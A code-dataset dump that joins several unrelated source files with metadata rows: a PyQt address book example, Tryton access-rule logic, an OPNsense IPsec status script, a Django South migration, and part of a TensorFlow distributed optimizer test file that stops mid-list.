buttonLayout1.addWidget(self.cancelButton)
buttonLayout1.addStretch()
buttonLayout2 = QtGui.QHBoxLayout()
buttonLayout2.addWidget(self.previousButton)
buttonLayout2.addWidget(self.nextButton)
mainLayout = QtGui.QGridLayout()
mainLayout.addWidget(nameLabel, 0, 0)
mainLayout.addWidget(self.nameLine, 0, 1)
mainLayout.addWidget(addressLabel, 1, 0, QtCore.Qt.AlignTop)
mainLayout.addWidget(self.addressText, 1, 1)
mainLayout.addLayout(buttonLayout1, 1, 2)
mainLayout.addLayout(buttonLayout2, 3, 1)
self.setLayout(mainLayout)
self.setWindowTitle("Simple Address Book")
def addContact(self):
self.oldName = self.nameLine.text()
self.oldAddress = self.addressText.toPlainText()
self.nameLine.clear()
self.addressText.clear()
self.updateInterface(self.AddingMode)
def editContact(self):
self.oldName = self.nameLine.text()
self.oldAddress = self.addressText.toPlainText()
self.updateInterface(self.EditingMode)
def submitContact(self):
name = self.nameLine.text()
address = self.addressText.toPlainText()
if name == "" or address == "":
QtGui.QMessageBox.information(self, "Empty Field",
"Please enter a name and address.")
return
if self.currentMode == self.AddingMode:
if name not in self.contacts:
self.contacts[name] = address
QtGui.QMessageBox.information(self, "Add Successful",
"\"%s\" has been added to your address book." % name)
else:
QtGui.QMessageBox.information(self, "Add Unsuccessful",
"Sorry, \"%s\" is already in your address book." % name)
return
elif self.currentMode == self.EditingMode:
if self.oldName != name:
if name not in self.contacts:
QtGui.QMessageBox.information(self, "Edit Successful",
"\"%s\" has been edited in your address book." % self.oldName)
del self.contacts[self.oldName]
self.contacts[name] = address
else:
QtGui.QMessageBox.information(self, "Edit Unsuccessful",
"Sorry, \"%s\" is already in your address book." % name)
return
elif self.oldAddress != address:
QtGui.QMessageBox.information(self, "Edit Successful",
"\"%s\" has been edited in your address book." % name)
self.contacts[name] = address
self.updateInterface(self.NavigationMode)
def cancel(self):
self.nameLine.setText(self.oldName)
self.addressText.setText(self.oldAddress)
self.updateInterface(self.NavigationMode)
def removeContact(self):
name = self.nameLine.text()
address = self.addressText.toPlainText()
if name in self.contacts:
button = QtGui.QMessageBox.question(self, "Confirm Remove",
"Are you sure you want to remove \"%s\"?" % name,
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if button == QtGui.QMessageBox.Yes:
self.previous()
del self.contacts[name]
QtGui.QMessageBox.information(self, "Remove Successful",
"\"%s\" has been removed from your address book." % name)
self.updateInterface(self.NavigationMode)
def next(self):
name = self.nameLine.text()
it = iter(self.contacts)
try:
while True:
this_name, _ = it.next()
if this_name == name:
next_name, next_address = it.next()
break
except StopIteration:
next_name, next_address = iter(self.contacts).next()
self.nameLine.setText(next_name)
self.addressText.setText(next_address)
def previous(self):
name = self.nameLine.text()
prev_name = prev_address = None
for this_name, this_address in self.contacts:
if this_name == name:
break
prev_name = this_name
prev_address = this_address
else:
self.nameLine.clear()
self.addressText.clear()
return
if prev_name is None:
for prev_name, prev_address in self.contacts:
pass
self.nameLine.setText(prev_name)
self.addressText.setText(prev_address)
def updateInterface(self, mode):
self.currentMode = mode
if self.currentMode in (self.AddingMode, self.EditingMode):
self.nameLine.setReadOnly(False)
self.nameLine.setFocus(QtCore.Qt.OtherFocusReason)
self.addressText.setReadOnly(False)
self.addButton.setEnabled(False)
self.editButton.setEnabled(False)
self.removeButton.setEnabled(False)
self.nextButton.setEnabled(False)
self.previousButton.setEnabled(False)
self.submitButton.show()
self.cancelButton.show()
elif self.currentMode == self.NavigationMode:
if not self.contacts:
self.nameLine.clear()
self.addressText.clear()
self.nameLine.setReadOnly(True)
self.addressText.setReadOnly(True)
self.addButton.setEnabled(True)
number = len(self.contacts)
self.editButton.setEnabled(number >= 1)
self.removeButton.setEnabled(number >= 1)
self.nextButton.setEnabled(number > 1)
self.previousButton.setEnabled(number >1 )
self.submitButton.hide()
self.cancelButton.hide()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
addressBook = AddressBook()
addressBook.show()
sys.exit(app.exec_())
| epl-1.0 | 8,617,441,876,815,813,000 | 32.684015 | 90 | 0.584152 | false |
kret0s/gnuhealth-live | tryton/server/trytond-3.8.3/trytond/ir/rule.py | 1 | 10814 | # This file is part of Tryton. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
from ..model import ModelView, ModelSQL, fields, EvalEnvironment, Check
from ..transaction import Transaction
from ..cache import Cache
from ..pool import Pool
from .. import backend
from ..pyson import PYSONDecoder
__all__ = [
'RuleGroup', 'Rule',
]
class RuleGroup(ModelSQL, ModelView):
"Rule group"
__name__ = 'ir.rule.group'
name = fields.Char('Name', select=True)
model = fields.Many2One('ir.model', 'Model', select=True,
required=True)
global_p = fields.Boolean('Global', select=True,
help="Make the rule global \nso every users must follow this rule")
default_p = fields.Boolean('Default', select=True,
help="Add this rule to all users by default")
rules = fields.One2Many('ir.rule', 'rule_group', 'Tests',
help="The rule is satisfied if at least one test is True")
groups = fields.Many2Many('ir.rule.group-res.group',
'rule_group', 'group', 'Groups')
# TODO remove to only use groups
users = fields.Many2Many('ir.rule.group-res.user',
'rule_group', 'user', 'Users')
perm_read = fields.Boolean('Read Access')
perm_write = fields.Boolean('Write Access')
perm_create = fields.Boolean('Create Access')
perm_delete = fields.Boolean('Delete Access')
@classmethod
def __setup__(cls):
super(RuleGroup, cls).__setup__()
cls._order.insert(0, ('model', 'ASC'))
cls._order.insert(1, ('global_p', 'ASC'))
cls._order.insert(2, ('default_p', 'ASC'))
t = cls.__table__()
cls._sql_constraints += [
('global_default_exclusive',
Check(t, (t.global_p == False) | (t.default_p == False)),
'Global and Default are mutually exclusive!'),
]
@staticmethod
def default_global_p():
return True
@staticmethod
def default_default_p():
return False
@staticmethod
def default_perm_read():
return True
@staticmethod
def default_perm_write():
return True
@staticmethod
def default_perm_create():
return True
@staticmethod
def default_perm_delete():
return True
@classmethod
def delete(cls, groups):
super(RuleGroup, cls).delete(groups)
# Restart the cache on the domain_get method of ir.rule
Pool().get('ir.rule')._domain_get_cache.clear()
@classmethod
def create(cls, vlist):
res = super(RuleGroup, cls).create(vlist)
# Restart the cache on the domain_get method of ir.rule
Pool().get('ir.rule')._domain_get_cache.clear()
return res
@classmethod
def write(cls, groups, vals, *args):
super(RuleGroup, cls).write(groups, vals, *args)
# Restart the cache on the domain_get method of ir.rule
Pool().get('ir.rule')._domain_get_cache.clear()
class Rule(ModelSQL, ModelView):
"Rule"
__name__ = 'ir.rule'
rule_group = fields.Many2One('ir.rule.group', 'Group', select=True,
required=True, ondelete="CASCADE")
domain = fields.Char('Domain', required=True,
help='Domain is evaluated with a PYSON context containing:\n'
'- "user" as the current user')
_domain_get_cache = Cache('ir_rule.domain_get', context=False)
@classmethod
def __setup__(cls):
super(Rule, cls).__setup__()
cls._error_messages.update({
'invalid_domain': 'Invalid domain in rule "%s".',
})
@classmethod
def __register__(cls, module_name):
TableHandler = backend.get('TableHandler')
super(Rule, cls).__register__(module_name)
table = TableHandler(Transaction().cursor, cls, module_name)
# Migration from 2.6: replace field, operator and operand by domain
table.not_null_action('field', action='remove')
table.not_null_action('operator', action='remove')
table.not_null_action('operand', action='remove')
@classmethod
def validate(cls, rules):
super(Rule, cls).validate(rules)
cls.check_domain(rules)
@classmethod
def check_domain(cls, rules):
ctx = cls._get_context()
for rule in rules:
try:
value = PYSONDecoder(ctx).decode(rule.domain)
except Exception:
cls.raise_user_error('invalid_domain', (rule.rec_name,))
if not isinstance(value, list):
cls.raise_user_error('invalid_domain', (rule.rec_name,))
else:
try:
fields.domain_validate(value)
except Exception:
cls.raise_user_error('invalid_domain', (rule.rec_name,))
@staticmethod
def _get_context():
User = Pool().get('res.user')
user_id = Transaction().user
with Transaction().set_context(_check_access=False, _datetime=None):
user = EvalEnvironment(User(user_id), User)
return {
'user': user,
}
@staticmethod
def _get_cache_key():
# _datetime value will be added to the domain
return (Transaction().user, Transaction().context.get('_datetime'))
@classmethod
def domain_get(cls, model_name, mode='read'):
assert mode in ['read', 'write', 'create', 'delete'], \
'Invalid domain mode for security'
# root user above constraint
if Transaction().user == 0:
if not Transaction().context.get('user'):
return
with Transaction().set_user(Transaction().context['user']):
return cls.domain_get(model_name, mode=mode)
key = (model_name, mode) + cls._get_cache_key()
domain = cls._domain_get_cache.get(key, False)
if domain is not False:
return domain
pool = Pool()
RuleGroup = pool.get('ir.rule.group')
Model = pool.get('ir.model')
RuleGroup_User = pool.get('ir.rule.group-res.user')
RuleGroup_Group = pool.get('ir.rule.group-res.group')
User_Group = pool.get('res.user-res.group')
cursor = Transaction().cursor
rule_table = cls.__table__()
rule_group = RuleGroup.__table__()
rule_group_user = RuleGroup_User.__table__()
rule_group_group = RuleGroup_Group.__table__()
user_group = User_Group.__table__()
model = Model.__table__()
user_id = Transaction().user
cursor.execute(*rule_table.join(rule_group,
condition=rule_group.id == rule_table.rule_group
).join(model,
condition=rule_group.model == model.id
).select(rule_table.id,
where=(model.model == model_name)
& (getattr(rule_group, 'perm_%s' % mode) == True)
& (rule_group.id.in_(
rule_group_user.select(rule_group_user.rule_group,
where=rule_group_user.user == user_id)
| rule_group_group.join(
user_group,
condition=(rule_group_group.group
== user_group.group)
).select(rule_group_group.rule_group,
where=user_group.user == user_id)
)
| (rule_group.default_p == True)
| (rule_group.global_p == True)
)))
ids = [x[0] for x in cursor.fetchall()]
if not ids:
cls._domain_get_cache.set(key, None)
return
clause = {}
clause_global = {}
ctx = cls._get_context()
# Use root user without context to prevent recursion
with Transaction().set_user(0), \
Transaction().set_context(user=0):
for rule in cls.browse(ids):
assert rule.domain, ('Rule domain empty,'
'check if migration was done')
dom = PYSONDecoder(ctx).decode(rule.domain)
if rule.rule_group.global_p:
clause_global.setdefault(rule.rule_group.id, ['OR'])
clause_global[rule.rule_group.id].append(dom)
else:
clause.setdefault(rule.rule_group.id, ['OR'])
clause[rule.rule_group.id].append(dom)
# Test if there is no rule_group that have no rule
cursor.execute(*rule_group.join(model,
condition=rule_group.model == model.id
).select(rule_group.id,
where=(model.model == model_name)
& ~rule_group.id.in_(rule_table.select(rule_table.rule_group))
& rule_group.id.in_(rule_group_user.select(
rule_group_user.rule_group,
where=rule_group_user.user == user_id)
| rule_group_group.join(user_group,
condition=rule_group_group.group == user_group.group
).select(rule_group_group.rule_group,
where=user_group.user == user_id))))
fetchone = cursor.fetchone()
if fetchone:
group_id = fetchone[0]
clause[group_id] = []
clause = clause.values()
if clause:
clause.insert(0, 'OR')
clause_global = clause_global.values()
if clause_global:
clause_global.insert(0, 'AND')
if clause and clause_global:
clause = ['AND', clause_global, clause]
elif clause_global:
clause = clause_global
cls._domain_get_cache.set(key, clause)
return clause
@classmethod
def query_get(cls, model_name, mode='read'):
pool = Pool()
Model = pool.get(model_name)
domain = cls.domain_get(model_name, mode=mode)
# Use root to prevent infinite recursion
with Transaction().set_user(0), \
Transaction().set_context(active_test=False, user=0):
return Model.search(domain, order=[], query=True)
@classmethod
def delete(cls, rules):
super(Rule, cls).delete(rules)
# Restart the cache on the domain_get method of ir.rule
cls._domain_get_cache.clear()
@classmethod
def create(cls, vlist):
res = super(Rule, cls).create(vlist)
# Restart the cache on the domain_get method of ir.rule
cls._domain_get_cache.clear()
return res
@classmethod
def write(cls, rules, vals, *args):
super(Rule, cls).write(rules, vals, *args)
# Restart the cache on the domain_get method
cls._domain_get_cache.clear()
| gpl-3.0 | 1,320,602,009,460,516,000 | 35.657627 | 78 | 0.561309 | false |
opnsense/core | src/opnsense/scripts/ipsec/list_status.py | 1 | 3842 | #!/usr/local/bin/python3
"""
Copyright (c) 2015-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
list ipsec status, using vici interface
"""
import sys
import socket
import ujson
import vici
try:
s = vici.Session()
except socket.error:
# cannot connect to session, strongswan not running?
print ('ipsec not active')
sys.exit(0)
def parse_sa(in_conn):
result = {'local-addrs': '', 'remote-addrs': '', 'children': '', 'local-id': '', 'remote-id': ''}
result['version'] = in_conn['version']
if 'local_addrs' in in_conn:
result['local-addrs'] = b','.join(in_conn['local_addrs'])
elif 'local-host' in in_conn:
result['local-addrs'] = in_conn['local-host']
if 'remote_addrs' in in_conn:
result['remote-addrs'] = b','.join(in_conn['remote_addrs'])
elif 'remote-host' in in_conn:
result['remote-addrs'] = in_conn['remote-host']
if 'children' in in_conn:
result['children'] = in_conn['children']
result['sas'] = []
return result
result = dict()
# parse connections
for conns in s.list_conns():
for connection_id in conns:
result[connection_id] = parse_sa(conns[connection_id])
result[connection_id]['routed'] = True
result[connection_id]['local-class'] = []
result[connection_id]['remote-class'] = []
# parse local-% and remote-% keys
for connKey in conns[connection_id].keys():
if connKey.find('local-') == 0:
if 'id' in conns[connection_id][connKey]:
result[connection_id]['local-id'] = conns[connection_id][connKey]['id']
result[connection_id]['local-class'].append(conns[connection_id][connKey]['class'])
elif connKey.find('remote-') == 0:
if 'id' in conns[connection_id][connKey]:
result[connection_id]['remote-id'] = conns[connection_id][connKey]['id']
result[connection_id]['remote-class'].append(conns[connection_id][connKey]['class'])
result[connection_id]['local-class'] = b'+'.join(result[connection_id]['local-class'])
result[connection_id]['remote-class'] = b'+'.join(result[connection_id]['remote-class'])
# attach Security Associations
for sas in s.list_sas():
for sa in sas:
if sa not in result:
result[sa] = parse_sa(sas[sa])
result[sa]['routed'] = False
result[sa]['sas'].append(sas[sa])
print (ujson.dumps(result, reject_bytes=False))
| bsd-2-clause | -7,422,858,684,513,032,000 | 41.688889 | 101 | 0.640552 | false |
ddalex/p9 | sign/migrations/0007_auto__add_field_channel_description.py | 1 | 7738 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Channel.description'
db.add_column(u'sign_channel', 'description',
self.gf('django.db.models.fields.TextField')(null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Channel.description'
db.delete_column(u'sign_channel', 'description')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sign.channel': {
'Meta': {'object_name': 'Channel'},
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'master': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
u'sign.channelrelay': {
'Meta': {'object_name': 'ChannelRelay'},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Channel']"}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'sign.client': {
'Meta': {'object_name': 'Client'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'externid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'useragent': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'})
},
u'sign.clientlog': {
'Meta': {'object_name': 'ClientLog'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'log': ('django.db.models.fields.TextField', [], {}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'sign.feedback': {
'Meta': {'object_name': 'Feedback'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'blank': 'True'}),
'useragent': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'useremail': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'usertext': ('django.db.models.fields.TextField', [], {})
},
u'sign.message': {
'Meta': {'object_name': 'Message'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sign.Client']"}),
'content': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msgtype': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recipient'", 'to': u"orm['sign.Client']"})
}
}
complete_apps = ['sign'] | mit | -8,665,449,170,731,710,000 | 66.295652 | 187 | 0.544456 | false |
Intel-Corporation/tensorflow | tensorflow/python/distribute/minimize_loss_test.py | 1 | 22211 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for running legacy optimizer code with DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute.single_loss_example import batchnorm_example
from tensorflow.python.distribute.single_loss_example import minimize_loss_example
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.ops.losses import losses_impl
VAR_MAP_V1 = {
"GradientDescent": ("dense/kernel", "dense/bias"),
"Adagrad": ("dense/kernel/Adagrad", "dense/kernel", "dense/bias/Adagrad",
"dense/bias")
}
VAR_MAP_V2 = {
"SGD": ("dense/bias", "learning_rate", "decay", "iter", "dense/kernel",
"momentum"),
"Adagrad": ("iter", "epsilon", "dense/bias", "dense/kernel",
"learning_rate", "decay", "dense/kernel/accumulator",
"dense/bias/accumulator")
}
class MinimizeLossStepTest(test.TestCase, parameterized.TestCase):
def _get_iterator(self, strategy, input_fn):
iterator = strategy.make_input_fn_iterator(lambda _: input_fn())
self.evaluate(iterator.initialize())
return iterator
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_optimizers(),
combinations.combine(mode=["graph"], use_callable_loss=[True, False])
+ combinations.combine(mode=["eager"], use_callable_loss=[True])) +
combinations.times(
strategy_combinations.distributions_and_v2_optimizers(),
combinations.combine(
mode=["graph", "eager"], use_callable_loss=[True])) +
combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v2,
mode=["graph"],
use_callable_loss=[True]) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1,
mode=["graph"],
use_callable_loss=[True, False]))
def testTrainNetwork(self, distribution, optimizer_fn, use_callable_loss):
with distribution.scope():
model_fn, dataset_fn, layer = minimize_loss_example(
optimizer_fn, use_bias=True, use_callable_loss=use_callable_loss)
def step_fn(ctx, inputs):
del ctx # Unused
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=2).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
weights, biases = [], []
for _ in range(5):
run_step()
weights.append(self.evaluate(layer.kernel))
biases.append(self.evaluate(layer.bias))
error = abs(numpy.add(numpy.squeeze(weights), numpy.squeeze(biases)) - 1)
is_not_increasing = all(y <= x for x, y in zip(error, error[1:]))
self.assertTrue(is_not_increasing)
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_optimizers(),
combinations.combine(mode=["graph"], use_callable_loss=[True, False])
+ combinations.combine(mode=["eager"], use_callable_loss=[True])) +
combinations.times(
strategy_combinations.distributions_and_v2_optimizers(),
combinations.combine(
mode=["graph", "eager"], use_callable_loss=[True])))
def testTrainNetworkByCallForEachReplica(self, distribution, optimizer_fn,
use_callable_loss):
with distribution.scope():
model_fn, dataset_fn, layer = minimize_loss_example(
optimizer_fn, use_bias=True, use_callable_loss=use_callable_loss)
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(iterator.get_next(),)))
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
weights, biases = [], []
for _ in range(10):
run_step()
weights.append(self.evaluate(layer.kernel))
biases.append(self.evaluate(layer.bias))
error = abs(numpy.add(numpy.squeeze(weights), numpy.squeeze(biases)) - 1)
is_not_increasing = all(y <= x for x, y in zip(error, error[1:]))
self.assertTrue(is_not_increasing)
@combinations.generate(
combinations.times(
strategy_combinations.distributions_and_v1_and_v2_optimizers(),
combinations.combine(mode=["graph", "eager"])) + combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1_and_v2,
mode=["graph"]))
def testOptimizerInsideModelFn(self, distribution, optimizer_fn):
created_variables = []
trainable_variables = []
def appending_creator(next_creator, *args, **kwargs):
v = next_creator(*args, **kwargs)
created_variables.append(v.name)
if "trainable" in kwargs and kwargs["trainable"]:
trainable_variables.append(v.name)
return v
# Creator scope needs to be set before it's used inside
# `distribution.scope`.
with variable_scope.variable_creator_scope(
appending_creator), distribution.scope():
model_fn, dataset_fn, _ = minimize_loss_example(
optimizer_fn,
use_bias=True,
use_callable_loss=True,
create_optimizer_inside_model_fn=True)
def step_fn(ctx, inputs):
del ctx # Unused
return distribution.group(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=1).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
run_step()
def get_expected_variables(optimizer_fn, num_parameter_devices):
optimizer = optimizer_fn()
name = optimizer._name
if isinstance(optimizer, optimizer_v2.OptimizerV2):
variables = VAR_MAP_V2[name]
else:
variables = VAR_MAP_V1[name]
extended_variables = [
v + "/replica_{}".format(replica)
for v in variables
for replica in range(1, num_parameter_devices)
]
variables = list(variables) + extended_variables
return set([v + ":0" for v in variables])
self.assertEqual(
get_expected_variables(optimizer_fn,
len(distribution.extended.parameter_devices)),
set(created_variables))
@combinations.generate(
combinations.times(
combinations.combine(momentum=[0.8, 0.9, 0.99], renorm=[False, True]),
combinations.times(
strategy_combinations.distributions_and_v1_and_v2_optimizers(),
combinations.combine(
mode=["graph", "eager"],
# TODO(isaprykin): Allow False here. Currently subsequent
# replicas will re-execute UPDATE_OPS of previous replicas.
update_ops_in_cross_replica_mode=[True])) +
combinations.combine(
distribution=[strategy_combinations.tpu_strategy],
optimizer_fn=strategy_combinations.optimizers_v1_and_v2,
mode=["graph"],
update_ops_in_cross_replica_mode=[False])))
def testTrainNetworkWithBatchNorm(self, distribution, optimizer_fn, momentum,
renorm, update_ops_in_cross_replica_mode):
"""Verifies that moving mean updates are reduced across replicas."""
with distribution.scope():
num_replicas = distribution.num_replicas_in_sync
model_fn, dataset_fn, batchnorm = batchnorm_example(
optimizer_fn,
batch_per_epoch=num_replicas,
momentum=momentum,
renorm=renorm,
update_ops_in_replica_mode=not update_ops_in_cross_replica_mode)
def step_fn(ctx, inputs):
del ctx # Unused
fetches = distribution.experimental_local_results(
distribution.extended.call_for_each_replica(
model_fn, args=(inputs,)))
if update_ops_in_cross_replica_mode:
fetches += tuple(ops.get_collection(ops.GraphKeys.UPDATE_OPS))
return control_flow_ops.group(fetches)
iterator = self._get_iterator(distribution, dataset_fn)
def run_step():
return distribution.extended.experimental_run_steps_on_iterator(
step_fn, iterator, iterations=1).run_op
if not context.executing_eagerly():
with self.cached_session() as sess:
run_step = sess.make_callable(run_step())
self.evaluate(variables_lib.global_variables_initializer())
expected_moving_means = [0.] * 8
def averaged_batch_mean(i):
# Each batch has shape [16, 8] where the ith element in jth list is
# (8 * j + i + replica_id * 100). So the batch mean in each replica is
# (60 + i + replica_id * 100). So here comes its batch mean over all
# replicas:
return 60. + i + (num_replicas - 1.) / 2. * 100.
for _ in range(10):
run_step()
moving_means = self.evaluate(batchnorm.moving_mean)
# We make sure that the moving_mean is updated as if the sample mean is
# calculated over all replicas.
for i, expected_moving_mean in enumerate(expected_moving_means):
expected_moving_means[i] -= ((
expected_moving_mean - averaged_batch_mean(i)) * (1.0 - momentum))
self.assertNear(expected_moving_means[i], moving_means[i], 0.0001)
@combinations.generate(
combinations.times(
combinations.combine(loss_reduction=[
losses_impl.Reduction.SUM, losses_impl.Reduction.MEAN,
losses_impl.Reduction.SUM_OVER_BATCH_SIZE,
losses_impl.Reduction.SUM_OVER_NONZERO_WEIGHTS
